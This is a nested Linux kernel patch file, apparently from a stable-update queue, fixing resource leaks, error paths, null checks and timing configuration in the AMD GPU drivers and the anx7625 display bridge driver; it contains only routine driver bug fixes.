+@@ -358,7 +359,30 @@ aldebaran_mode2_restore_hwcontext(struct amdgpu_reset_control *reset_ctl,
+ 		 */
+ 		amdgpu_register_gpu_instance(tmp_adev);
+ 
+-		/* Resume RAS */
++		/* Resume RAS, ecc_irq */
++		con = amdgpu_ras_get_context(tmp_adev);
++		if (!amdgpu_sriov_vf(tmp_adev) && con) {
++			if (tmp_adev->sdma.ras &&
++				tmp_adev->sdma.ras->ras_block.ras_late_init) {
++				r = tmp_adev->sdma.ras->ras_block.ras_late_init(tmp_adev,
++						&tmp_adev->sdma.ras->ras_block.ras_comm);
++				if (r) {
++					dev_err(tmp_adev->dev, "SDMA failed to execute ras_late_init! ret:%d\n", r);
++					goto end;
++				}
++			}
++
++			if (tmp_adev->gfx.ras &&
++				tmp_adev->gfx.ras->ras_block.ras_late_init) {
++				r = tmp_adev->gfx.ras->ras_block.ras_late_init(tmp_adev,
++						&tmp_adev->gfx.ras->ras_block.ras_comm);
++				if (r) {
++					dev_err(tmp_adev->dev, "GFX failed to execute ras_late_init! ret:%d\n", r);
++					goto end;
++				}
++			}
++		}
++
+ 		amdgpu_ras_resume(tmp_adev);
+ 
+ 		/* Update PSP FW topology after reset */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_fence.c
+index 469785d337911..1ef758ac5076e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_fence.c
+@@ -90,7 +90,7 @@ struct amdgpu_amdkfd_fence *to_amdgpu_amdkfd_fence(struct dma_fence *f)
+ 		return NULL;
+ 
+ 	fence = container_of(f, struct amdgpu_amdkfd_fence, base);
+-	if (fence && f->ops == &amdkfd_fence_ops)
++	if (f->ops == &amdkfd_fence_ops)
+ 		return fence;
+ 
+ 	return NULL;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index a5352e5e2bd47..4b91f95066eca 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -1310,6 +1310,7 @@ bool amdgpu_device_need_post(struct amdgpu_device *adev)
+ 				return true;
+ 
+ 			fw_ver = *((uint32_t *)adev->pm.fw->data + 69);
++			release_firmware(adev->pm.fw);
+ 			if (fw_ver < 0x00160e00)
+ 				return true;
+ 		}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+index 2bc791ed8830a..ea0fb079f942a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+@@ -808,19 +808,26 @@ int amdgpu_gmc_vram_checking(struct amdgpu_device *adev)
+ 	 * seconds, so here, we just pick up three parts for emulation.
+ 	 */
+ 	ret = memcmp(vram_ptr, cptr, 10);
+-	if (ret)
+-		return ret;
++	if (ret) {
++		ret = -EIO;
++		goto release_buffer;
++	}
+ 
+ 	ret = memcmp(vram_ptr + (size / 2), cptr, 10);
+-	if (ret)
+-		return ret;
++	if (ret) {
++		ret = -EIO;
++		goto release_buffer;
++	}
+ 
+ 	ret = memcmp(vram_ptr + size - 10, cptr, 10);
+-	if (ret)
+-		return ret;
++	if (ret) {
++		ret = -EIO;
++		goto release_buffer;
++	}
+ 
++release_buffer:
+ 	amdgpu_bo_free_kernel(&vram_bo, &vram_gpu,
+ 			&vram_ptr);
+ 
+-	return 0;
++	return ret;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index 0ee7c935fba1f..cde2fd2f71171 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -1222,19 +1222,15 @@ int amdgpu_bo_get_metadata(struct amdgpu_bo *bo, void *buffer,
+  * amdgpu_bo_move_notify - notification about a memory move
+  * @bo: pointer to a buffer object
+  * @evict: if this move is evicting the buffer from the graphics address space
+- * @new_mem: new information of the bufer object
+  *
+  * Marks the corresponding &amdgpu_bo buffer object as invalid, also performs
+  * bookkeeping.
+  * TTM driver callback which is called when ttm moves a buffer.
+  */
+-void amdgpu_bo_move_notify(struct ttm_buffer_object *bo,
+-			   bool evict,
+-			   struct ttm_resource *new_mem)
++void amdgpu_bo_move_notify(struct ttm_buffer_object *bo, bool evict)
+ {
+ 	struct amdgpu_device *adev = amdgpu_ttm_adev(bo->bdev);
+ 	struct amdgpu_bo *abo;
+-	struct ttm_resource *old_mem = bo->resource;
+ 
+ 	if (!amdgpu_bo_is_amdgpu_bo(bo))
+ 		return;
+@@ -1251,13 +1247,6 @@ void amdgpu_bo_move_notify(struct ttm_buffer_object *bo,
+ 	/* remember the eviction */
+ 	if (evict)
+ 		atomic64_inc(&adev->num_evictions);
+-
+-	/* update statistics */
+-	if (!new_mem)
+-		return;
+-
+-	/* move_notify is called before move happens */
+-	trace_amdgpu_bo_move(abo, new_mem->mem_type, old_mem->mem_type);
+ }
+ 
+ void amdgpu_bo_get_memory(struct amdgpu_bo *bo, uint64_t *vram_mem,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+index 6dcd7bab42fbb..2ada421e79e4f 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.h
+@@ -312,9 +312,7 @@ int amdgpu_bo_set_metadata (struct amdgpu_bo *bo, void *metadata,
+ int amdgpu_bo_get_metadata(struct amdgpu_bo *bo, void *buffer,
+ 			   size_t buffer_size, uint32_t *metadata_size,
+ 			   uint64_t *flags);
+-void amdgpu_bo_move_notify(struct ttm_buffer_object *bo,
+-			   bool evict,
+-			   struct ttm_resource *new_mem);
++void amdgpu_bo_move_notify(struct ttm_buffer_object *bo, bool evict);
+ void amdgpu_bo_release_notify(struct ttm_buffer_object *bo);
+ vm_fault_t amdgpu_bo_fault_reserve_notify(struct ttm_buffer_object *bo);
+ void amdgpu_bo_fence(struct amdgpu_bo *bo, struct dma_fence *fence,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_sync.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_sync.c
+index 090e66a1b2842..54bdbd83a8cc7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_sync.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_sync.c
+@@ -191,7 +191,8 @@ static bool amdgpu_sync_test_fence(struct amdgpu_device *adev,
+ 
+ 	/* Never sync to VM updates either. */
+ 	if (fence_owner == AMDGPU_FENCE_OWNER_VM &&
+-	    owner != AMDGPU_FENCE_OWNER_UNDEFINED)
++	    owner != AMDGPU_FENCE_OWNER_UNDEFINED &&
++	    owner != AMDGPU_FENCE_OWNER_KFD)
+ 		return false;
+ 
+ 	/* Ignore fences depending on the sync mode */
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+index 10469f20a10ca..158b791883f03 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ttm.c
+@@ -555,10 +555,11 @@ static int amdgpu_bo_move(struct ttm_buffer_object *bo, bool evict,
+ 			return r;
+ 	}
+ 
++	trace_amdgpu_bo_move(abo, new_mem->mem_type, old_mem->mem_type);
+ out:
+ 	/* update statistics */
+ 	atomic64_add(bo->base.size, &adev->num_bytes_moved);
+-	amdgpu_bo_move_notify(bo, evict, new_mem);
++	amdgpu_bo_move_notify(bo, evict);
+ 	return 0;
+ }
+ 
+@@ -1503,7 +1504,7 @@ static int amdgpu_ttm_access_memory(struct ttm_buffer_object *bo,
+ static void
+ amdgpu_bo_delete_mem_notify(struct ttm_buffer_object *bo)
+ {
+-	amdgpu_bo_move_notify(bo, false, NULL);
++	amdgpu_bo_move_notify(bo, false);
+ }
+ 
+ static struct ttm_device_funcs amdgpu_bo_driver = {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+index 6e7058a2d1c82..779707f19c886 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ucode.c
+@@ -1110,9 +1110,13 @@ int amdgpu_ucode_request(struct amdgpu_device *adev, const struct firmware **fw,
+ 
+ 	if (err)
+ 		return -ENODEV;
++
+ 	err = amdgpu_ucode_validate(*fw);
+-	if (err)
++	if (err) {
+ 		dev_dbg(adev->dev, "\"%s\" failed to validate\n", fw_name);
++		release_firmware(*fw);
++		*fw = NULL;
++	}
+ 
+ 	return err;
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+index d96ee48e1706a..35921b41fc27c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v10_0.c
+@@ -1144,6 +1144,10 @@ static int gmc_v10_0_hw_fini(void *handle)
+ 
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
++	if (adev->gmc.ecc_irq.funcs &&
++		amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__UMC))
++		amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+index 7124347d2b6c4..310a5607d83b6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v11_0.c
+@@ -951,6 +951,11 @@ static int gmc_v11_0_hw_fini(void *handle)
+ 	}
+ 
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
++
++	if (adev->gmc.ecc_irq.funcs &&
++		amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__UMC))
++		amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
++
+ 	gmc_v11_0_gart_disable(adev);
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v6_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v6_0.c
+index ec291d28edffd..345f0c9f551c6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v6_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v6_0.c
+@@ -921,8 +921,8 @@ static int gmc_v6_0_hw_init(void *handle)
+ 
+ 	if (amdgpu_emu_mode == 1)
+ 		return amdgpu_gmc_vram_checking(adev);
+-	else
+-		return r;
++
++	return 0;
+ }
+ 
+ static int gmc_v6_0_hw_fini(void *handle)
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v7_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v7_0.c
+index 979da6f510e88..12411f4c1b9af 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v7_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v7_0.c
+@@ -1110,8 +1110,8 @@ static int gmc_v7_0_hw_init(void *handle)
+ 
+ 	if (amdgpu_emu_mode == 1)
+ 		return amdgpu_gmc_vram_checking(adev);
+-	else
+-		return r;
++
++	return 0;
+ }
+ 
+ static int gmc_v7_0_hw_fini(void *handle)
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v8_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v8_0.c
+index 382dde1ce74c0..cec9926e8bdd8 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v8_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v8_0.c
+@@ -1240,8 +1240,8 @@ static int gmc_v8_0_hw_init(void *handle)
+ 
+ 	if (amdgpu_emu_mode == 1)
+ 		return amdgpu_gmc_vram_checking(adev);
+-	else
+-		return r;
++
++	return 0;
+ }
+ 
+ static int gmc_v8_0_hw_fini(void *handle)
+diff --git a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+index 0d9e9d9dd4a1d..3e631aefa7917 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gmc_v9_0.c
+@@ -1861,8 +1861,8 @@ static int gmc_v9_0_hw_init(void *handle)
+ 
+ 	if (amdgpu_emu_mode == 1)
+ 		return amdgpu_gmc_vram_checking(adev);
+-	else
+-		return r;
++
++	return 0;
+ }
+ 
+ /**
+@@ -1900,6 +1900,10 @@ static int gmc_v9_0_hw_fini(void *handle)
+ 
+ 	amdgpu_irq_put(adev, &adev->gmc.vm_fault, 0);
+ 
++	if (adev->gmc.ecc_irq.funcs &&
++		amdgpu_ras_is_supported(adev, AMDGPU_RAS_BLOCK__UMC))
++		amdgpu_irq_put(adev, &adev->gmc.ecc_irq, 0);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+index 208812512d8a8..7fa5e70f1aace 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_svm.c
+@@ -380,14 +380,9 @@ static void svm_range_bo_release(struct kref *kref)
+ 		spin_lock(&svm_bo->list_lock);
+ 	}
+ 	spin_unlock(&svm_bo->list_lock);
+-	if (!dma_fence_is_signaled(&svm_bo->eviction_fence->base)) {
+-		/* We're not in the eviction worker.
+-		 * Signal the fence and synchronize with any
+-		 * pending eviction work.
+-		 */
++	if (!dma_fence_is_signaled(&svm_bo->eviction_fence->base))
++		/* We're not in the eviction worker. Signal the fence. */
+ 		dma_fence_signal(&svm_bo->eviction_fence->base);
+-		cancel_work_sync(&svm_bo->eviction_work);
+-	}
+ 	dma_fence_put(&svm_bo->eviction_fence->base);
+ 	amdgpu_bo_unref(&svm_bo->bo);
+ 	kfree(svm_bo);
+@@ -2246,8 +2241,10 @@ retry:
+ 		mutex_unlock(&svms->lock);
+ 		mmap_write_unlock(mm);
+ 
+-		/* Pairs with mmget in svm_range_add_list_work */
+-		mmput(mm);
++		/* Pairs with mmget in svm_range_add_list_work. If this drops the
++		 * last mm refcount, the release work is scheduled to avoid
++		 * circular locking.
++		 */
++		mmput_async(mm);
+ 
+ 		spin_lock(&svms->deferred_list_lock);
+ 	}
+@@ -2556,6 +2553,7 @@ svm_range_get_range_boundaries(struct kfd_process *p, int64_t addr,
+ {
+ 	struct vm_area_struct *vma;
+ 	struct interval_tree_node *node;
++	struct rb_node *rb_node;
+ 	unsigned long start_limit, end_limit;
+ 
+ 	vma = find_vma(p->mm, addr << PAGE_SHIFT);
+@@ -2578,16 +2576,15 @@ svm_range_get_range_boundaries(struct kfd_process *p, int64_t addr,
+ 	if (node) {
+ 		end_limit = min(end_limit, node->start);
+ 		/* Last range that ends before the fault address */
+-		node = container_of(rb_prev(&node->rb),
+-				    struct interval_tree_node, rb);
++		rb_node = rb_prev(&node->rb);
+ 	} else {
+ 		/* Last range must end before addr because
+ 		 * there was no range after addr
+ 		 */
+-		node = container_of(rb_last(&p->svms.objects.rb_root),
+-				    struct interval_tree_node, rb);
++		rb_node = rb_last(&p->svms.objects.rb_root);
+ 	}
+-	if (node) {
++	if (rb_node) {
++		node = container_of(rb_node, struct interval_tree_node, rb);
+ 		if (node->last >= addr) {
+ 			WARN(1, "Overlap with prev node and page fault addr\n");
+ 			return -EFAULT;
+@@ -3310,13 +3307,14 @@ svm_range_trigger_migration(struct mm_struct *mm, struct svm_range *prange,
+ 
+ int svm_range_schedule_evict_svm_bo(struct amdgpu_amdkfd_fence *fence)
+ {
+-	if (!fence)
+-		return -EINVAL;
+-
+-	if (dma_fence_is_signaled(&fence->base))
+-		return 0;
+-
+-	if (fence->svm_bo) {
++	/* Dereferencing fence->svm_bo is safe here because the fence hasn't
++	 * signaled yet and we're under the protection of the fence->lock.
++	 * After the fence is signaled in svm_range_bo_release, we cannot get
++	 * here any more.
++	 *
++	 * Reference is dropped in svm_range_evict_svm_bo_worker.
++	 */
++	if (svm_bo_ref_unless_zero(fence->svm_bo)) {
+ 		WRITE_ONCE(fence->svm_bo->evicting, 1);
+ 		schedule_work(&fence->svm_bo->eviction_work);
+ 	}
+@@ -3331,8 +3329,6 @@ static void svm_range_evict_svm_bo_worker(struct work_struct *work)
+ 	int r = 0;
+ 
+ 	svm_bo = container_of(work, struct svm_range_bo, eviction_work);
+-	if (!svm_bo_ref_unless_zero(svm_bo))
+-		return; /* svm_bo was freed while eviction was pending */
+ 
+ 	if (mmget_not_zero(svm_bo->eviction_fence->mm)) {
+ 		mm = svm_bo->eviction_fence->mm;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+index 705d9e91b5aa3..029916971bf66 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c
+@@ -1513,17 +1513,19 @@ static int kfd_add_peer_prop(struct kfd_topology_device *kdev,
+ 		/* CPU->CPU  link*/
+ 		cpu_dev = kfd_topology_device_by_proximity_domain(iolink1->node_to);
+ 		if (cpu_dev) {
+-			list_for_each_entry(iolink3, &cpu_dev->io_link_props, list)
+-				if (iolink3->node_to == iolink2->node_to)
+-					break;
+-
+-			props->weight += iolink3->weight;
+-			props->min_latency += iolink3->min_latency;
+-			props->max_latency += iolink3->max_latency;
+-			props->min_bandwidth = min(props->min_bandwidth,
+-							iolink3->min_bandwidth);
+-			props->max_bandwidth = min(props->max_bandwidth,
+-							iolink3->max_bandwidth);
++			list_for_each_entry(iolink3, &cpu_dev->io_link_props, list) {
++				if (iolink3->node_to != iolink2->node_to)
++					continue;
++
++				props->weight += iolink3->weight;
++				props->min_latency += iolink3->min_latency;
++				props->max_latency += iolink3->max_latency;
++				props->min_bandwidth = min(props->min_bandwidth,
++							   iolink3->min_bandwidth);
++				props->max_bandwidth = min(props->max_bandwidth,
++							   iolink3->max_bandwidth);
++				break;
++			}
+ 		} else {
+ 			WARN(1, "CPU node not found");
+ 		}
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 7a309547c2b3f..f415733f1a979 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -1903,6 +1903,10 @@ static enum dc_status dc_commit_state_no_check(struct dc *dc, struct dc_state *c
+ 		wait_for_no_pipes_pending(dc, context);
+ 		/* pplib is notified if disp_num changed */
+ 		dc->hwss.optimize_bandwidth(dc, context);
++		/* Need to do OTG sync again, as the OTG could be out of sync due to
++		 * the OTG workaround applied during the clock update.
++		 */
++		dc_trigger_sync(dc, context);
+ 	}
+ 
+ 	if (dc->hwss.update_dsc_pg)
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_hw_types.h b/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
+index 46c2b991aa108..811c117665e73 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_hw_types.h
+@@ -244,7 +244,7 @@ enum pixel_format {
+ #define DC_MAX_DIRTY_RECTS 3
+ struct dc_flip_addrs {
+ 	struct dc_plane_address address;
+-	unsigned int flip_timestamp_in_us;
++	unsigned long long flip_timestamp_in_us;
+ 	bool flip_immediate;
+ 	/* TODO: add flip duration for FreeSync */
+ 	bool triplebuffer_flips;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index 19f55657272e4..cc8c1a48c5c4d 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -810,6 +810,8 @@ static void DISPCLKDPPCLKDCFCLKDeepSleepPrefetchParametersWatermarksAndPerforman
+ 					(v->DRAMSpeedPerState[mode_lib->vba.VoltageLevel] <= MEM_STROBE_FREQ_MHZ ||
+ 						v->DCFCLKPerState[mode_lib->vba.VoltageLevel] <= DCFCLK_FREQ_EXTRA_PREFETCH_REQ_MHZ) ?
+ 							mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
++					mode_lib->vba.PrefetchModePerState[mode_lib->vba.VoltageLevel][mode_lib->vba.maxMpcComb] > 0 || mode_lib->vba.DRAMClockChangeRequirementFinal == false,
++
+ 					/* Output */
+ 					&v->DSTXAfterScaler[k],
+ 					&v->DSTYAfterScaler[k],
+@@ -3291,6 +3293,7 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->SwathHeightCThisState[k], v->TWait,
+ 							(v->DRAMSpeedPerState[i] <= MEM_STROBE_FREQ_MHZ || v->DCFCLKState[i][j] <= DCFCLK_FREQ_EXTRA_PREFETCH_REQ_MHZ) ?
+ 									mode_lib->vba.ip.min_prefetch_in_strobe_us : 0,
++							mode_lib->vba.PrefetchModePerState[i][j] > 0 || mode_lib->vba.DRAMClockChangeRequirementFinal == false,
+ 
+ 							/* Output */
+ 							&v->dummy_vars.dml32_ModeSupportAndSystemConfigurationFull.DSTXAfterScaler[k],
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+index 23e4be2ad63f9..7f4fc49be35ca 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.c
+@@ -3418,6 +3418,7 @@ bool dml32_CalculatePrefetchSchedule(
+ 		unsigned int SwathHeightC,
+ 		double TWait,
+ 		double TPreReq,
++		bool ExtendPrefetchIfPossible,
+ 		/* Output */
+ 		double   *DSTXAfterScaler,
+ 		double   *DSTYAfterScaler,
+@@ -3887,12 +3888,32 @@ bool dml32_CalculatePrefetchSchedule(
+ 			/* Clamp to oto for bandwidth calculation */
+ 			LinesForPrefetchBandwidth = dst_y_prefetch_oto;
+ 		} else {
+-			*DestinationLinesForPrefetch = dst_y_prefetch_equ;
+-			TimeForFetchingMetaPTE = Tvm_equ;
+-			TimeForFetchingRowInVBlank = Tr0_equ;
+-			*PrefetchBandwidth = prefetch_bw_equ;
+-			/* Clamp to equ for bandwidth calculation */
+-			LinesForPrefetchBandwidth = dst_y_prefetch_equ;
++			/* For mode programming we want to extend the prefetch as much as possible
++			 * (up to oto, or as long as we can for equ) if we're not already applying
++			 * the 60us prefetch requirement. This is to avoid intermittent underflow
++			 * issues during prefetch.
++			 *
++			 * The prefetch extension is applied under the following scenarios:
++			 * 1. We're in prefetch mode > 0 (i.e. we don't support MCLK switch in blank)
++	 * 2. We're using subvp or drr methods of p-state switch, in which case
++	 *    we don't care if prefetch takes up more of the blanking time
++			 *
++			 * Mode programming typically chooses the smallest prefetch time possible
++			 * (i.e. highest bandwidth during prefetch) presumably to create margin between
++			 * p-states / c-states that happen in vblank and prefetch. Therefore we only
++			 * apply this prefetch extension when p-state in vblank is not required (UCLK
++			 * p-states take up the most vblank time).
++			 */
++			if (ExtendPrefetchIfPossible && TPreReq == 0 && VStartup < MaxVStartup) {
++				MyError = true;
++			} else {
++				*DestinationLinesForPrefetch = dst_y_prefetch_equ;
++				TimeForFetchingMetaPTE = Tvm_equ;
++				TimeForFetchingRowInVBlank = Tr0_equ;
++				*PrefetchBandwidth = prefetch_bw_equ;
++				/* Clamp to equ for bandwidth calculation */
++				LinesForPrefetchBandwidth = dst_y_prefetch_equ;
++			}
+ 		}
+ 
+ 		*DestinationLinesToRequestVMInVBlank = dml_ceil(4.0 * TimeForFetchingMetaPTE / LineTime, 1.0) / 4.0;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
+index 779c6805f5997..1823434d8ede2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_util_32.h
+@@ -744,6 +744,7 @@ bool dml32_CalculatePrefetchSchedule(
+ 		unsigned int SwathHeightC,
+ 		double TWait,
+ 		double TPreReq,
++		bool ExtendPrefetchIfPossible,
+ 		/* Output */
+ 		double   *DSTXAfterScaler,
+ 		double   *DSTYAfterScaler,
+diff --git a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+index e2f436dea5654..67287ad07226c 100644
+--- a/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
++++ b/drivers/gpu/drm/amd/display/modules/power/power_helpers.c
+@@ -818,8 +818,6 @@ bool is_psr_su_specific_panel(struct dc_link *link)
+ 				isPSRSUSupported = false;
+ 			else if (dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x03)
+ 				isPSRSUSupported = false;
+-			else if (dpcd_caps->sink_dev_id_str[1] == 0x08 && dpcd_caps->sink_dev_id_str[0] == 0x03)
+-				isPSRSUSupported = false;
+ 			else if (dpcd_caps->psr_info.force_psrsu_cap == 0x1)
+ 				isPSRSUSupported = true;
+ 		}
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/process_pptables_v1_0.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/process_pptables_v1_0.c
+index f2a55c1413f59..17882f8dfdd34 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/process_pptables_v1_0.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/process_pptables_v1_0.c
+@@ -200,7 +200,7 @@ static int get_platform_power_management_table(
+ 		struct pp_hwmgr *hwmgr,
+ 		ATOM_Tonga_PPM_Table *atom_ppm_table)
+ {
+-	struct phm_ppm_table *ptr = kzalloc(sizeof(ATOM_Tonga_PPM_Table), GFP_KERNEL);
++	struct phm_ppm_table *ptr = kzalloc(sizeof(*ptr), GFP_KERNEL);
+ 	struct phm_ppt_v1_information *pp_table_information =
+ 		(struct phm_ppt_v1_information *)(hwmgr->pptable);
+ 
+diff --git a/drivers/gpu/drm/bridge/analogix/anx7625.c b/drivers/gpu/drm/bridge/analogix/anx7625.c
+index 5f8137e9cfd7a..77a304ac4d75e 100644
+--- a/drivers/gpu/drm/bridge/analogix/anx7625.c
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.c
+@@ -1300,10 +1300,32 @@ static void anx7625_config(struct anx7625_data *ctx)
+ 			  XTAL_FRQ_SEL, XTAL_FRQ_27M);
+ }
+ 
++static int anx7625_hpd_timer_config(struct anx7625_data *ctx)
++{
++	int ret;
++
++	/* Set irq detect window to 2ms */
++	ret = anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
++				HPD_DET_TIMER_BIT0_7, HPD_TIME & 0xFF);
++	ret |= anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
++				 HPD_DET_TIMER_BIT8_15,
++				 (HPD_TIME >> 8) & 0xFF);
++	ret |= anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
++				 HPD_DET_TIMER_BIT16_23,
++				 (HPD_TIME >> 16) & 0xFF);
++
++	return ret;
++}
++
++static int anx7625_read_hpd_gpio_config_status(struct anx7625_data *ctx)
++{
++	return anx7625_reg_read(ctx, ctx->i2c.rx_p0_client, GPIO_CTRL_2);
++}
++
+ static void anx7625_disable_pd_protocol(struct anx7625_data *ctx)
+ {
+ 	struct device *dev = &ctx->client->dev;
+-	int ret;
++	int ret, val;
+ 
+ 	/* Reset main ocm */
+ 	ret = anx7625_reg_write(ctx, ctx->i2c.rx_p0_client, 0x88, 0x40);
+@@ -1317,6 +1339,19 @@ static void anx7625_disable_pd_protocol(struct anx7625_data *ctx)
+ 		DRM_DEV_DEBUG_DRIVER(dev, "disable PD feature fail.\n");
+ 	else
+ 		DRM_DEV_DEBUG_DRIVER(dev, "disable PD feature succeeded.\n");
++
++	/*
++	 * Make sure the HPD GPIO is configured after OCM release, before
++	 * setting the HPD detect window register. Poll the status register
++	 * for at most 40ms, then configure the HPD irq detect window register.
++	 */
++	readx_poll_timeout(anx7625_read_hpd_gpio_config_status,
++			   ctx, val,
++			   ((val & HPD_SOURCE) || (val < 0)),
++			   2000, 2000 * 20);
++
++	/* Set HPD irq detect window to 2ms */
++	anx7625_hpd_timer_config(ctx);
+ }
+ 
+ static int anx7625_ocm_loading_check(struct anx7625_data *ctx)
+@@ -1440,20 +1475,6 @@ static void anx7625_start_dp_work(struct anx7625_data *ctx)
+ 
+ static int anx7625_read_hpd_status_p0(struct anx7625_data *ctx)
+ {
+-	int ret;
+-
+-	/* Set irq detect window to 2ms */
+-	ret = anx7625_reg_write(ctx, ctx->i2c.tx_p2_client,
+-				HPD_DET_TIMER_BIT0_7, HPD_TIME & 0xFF);
